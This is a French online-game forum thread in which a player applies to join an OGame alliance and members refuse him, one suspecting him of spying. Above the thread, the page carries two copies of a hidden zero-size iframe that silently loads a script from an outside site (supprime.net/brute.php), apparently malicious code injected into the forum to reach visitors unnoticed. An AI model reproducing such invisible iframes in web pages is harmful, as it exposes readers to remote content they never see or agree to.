Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
Le deal à ne pas rater :
Bon plan achat en duo : 2ème robot cuiseur Moulinex Companion ...
600 €
Voir le deal

 

 Candidature Alexou

Aller en bas 
5 participants
AuteurMessage
Alexou




Messages : 1
Date d'inscription : 08/11/2009

Candidature Alexou Empty
MessageSujet: Candidature Alexou   Candidature Alexou Icon_minitimeMar 10 Nov - 16:54

1] Combien avez-vous de points (Classements points, flottes et recherches)

Points 1.101.314 - 108 iem
Flotte 21.614 - 47iem
Recherche 391 - 135 iem

2] Combien de planètes possédez-vous

9 planètes ( une au centre de chaque Galaxie ) + 4 lunes G2,G3,G4,G5 ( les autres sont en cours )


3] Depuis combien de temps êtes-vous présent dans cet Univers

Je l'ai commencé avec 2 mois de retard.


4] Quel(s) autre(s) Univers avez-vous fréquenté et quels en sont vos expériences et niveaux

J'ai été top50 sur l'uni7 mais ça date ... J'avais stoppé oGame car ça me bouffait la vie mais après presque 2 ans d'arrêt ça va mieux.


5] Avez-vous déjà été dans une autre alliance auparavant dans cet Univers Si oui, pourquoi l'avoir quittée

Je suis actuellement dans la HJ mais depuis peu l'alliance est (trop) inactive et avec les portes de saut qui se profilent
et la HJ qui deviens une alliance de minier je me dis que je n'y ai plus trop ma place ( j'ai plutôt envie de les raider ... )


6] Quel style de jeu avez-vous

Pour l'instant je suis minier à la base mais ma flotte progresse de jours en jours et elle est assez sympa pour faire de beaux groupés.

7] Quelle est votre fréquence de connections par jour / semaine sur Ogame et sur le forum

Plusieurs fois par jours tous les jours ( sauf le weekend ou des fois je ne touche pas mon compte )


8] En intégrant notre alliance, que pensez-vous pouvoir nous apporter Et à l'inverse qu'est-ce que notre alliance pourrait vous apporter

Vous pouvez m'apporter le soutien nécessaire pour des AG du fait de votre nombre et à contrario je peux vous soutenir aussi ( je suis présent dans toutes les galaxies ).
De plus j'ai perdu de mon habitude a raider et je ne suis pas habitué aux nouvelles techniques donc je sens que vous pouvez m'apporter un réel plus.


Voilà pour ce qui concerne oGame, cette présentation est une synthèse des questions habituellement posées dans les autre alliances ( la HJ en l'occurence )

Pour ce qui est du réel, je m'appelle Mickaël, j'ai 23 ans et j'habite Lyon. Je travaille dans un bureau d'étude Electrotechnique et donc j'ai une vie IRL. N'attendez pas (plus) de moi un no-life. Je ne m'étendrai pas plus car je ne souhaite pas déballer ma vie privée ici.

Si vous avez des questions, n'hésitez pas.

Alexou
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature Alexou Empty
MessageSujet: Re: Candidature Alexou   Candidature Alexou Icon_minitimeMar 10 Nov - 19:43

Pourquoi un ancien HJ veux venir chez nous ?

Puit te connais pas trop, donc comme pour tout les gens que je connais pas je vais dire Non désolé Wink
Revenir en haut Aller en bas
ilixa




Messages : 161
Date d'inscription : 26/05/2009
Age : 36
Localisation : Deriere ton cul

Candidature Alexou Empty
MessageSujet: Re: Candidature Alexou   Candidature Alexou Icon_minitimeMer 11 Nov - 1:36

Pas de recrutement chez nous désoler !!!
Revenir en haut Aller en bas
Chipeur le renard




Messages : 104
Date d'inscription : 26/05/2009

Candidature Alexou Empty
MessageSujet: Re: Candidature Alexou   Candidature Alexou Icon_minitimeVen 13 Nov - 22:47

slt,
si tu veux raidez les hj, tu peux le faire sans ally !!
bonne chance a toi
Revenir en haut Aller en bas
CreAtivE
Admin
CreAtivE


Messages : 300
Date d'inscription : 26/05/2009
Age : 42

Candidature Alexou Empty
MessageSujet: Re: Candidature Alexou   Candidature Alexou Icon_minitimeLun 16 Nov - 6:31

Non merci pas de taupe chez nous Very Happy .. le mec depuis qu'il a fait une candid il m'a jamais autant sondé ... bientôt dans les cyclos?
Revenir en haut Aller en bas
Contenu sponsorisé





Candidature Alexou Empty
MessageSujet: Re: Candidature Alexou   Candidature Alexou Icon_minitime

Revenir en haut Aller en bas
 
Candidature Alexou
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Recrutement-
Sauter vers: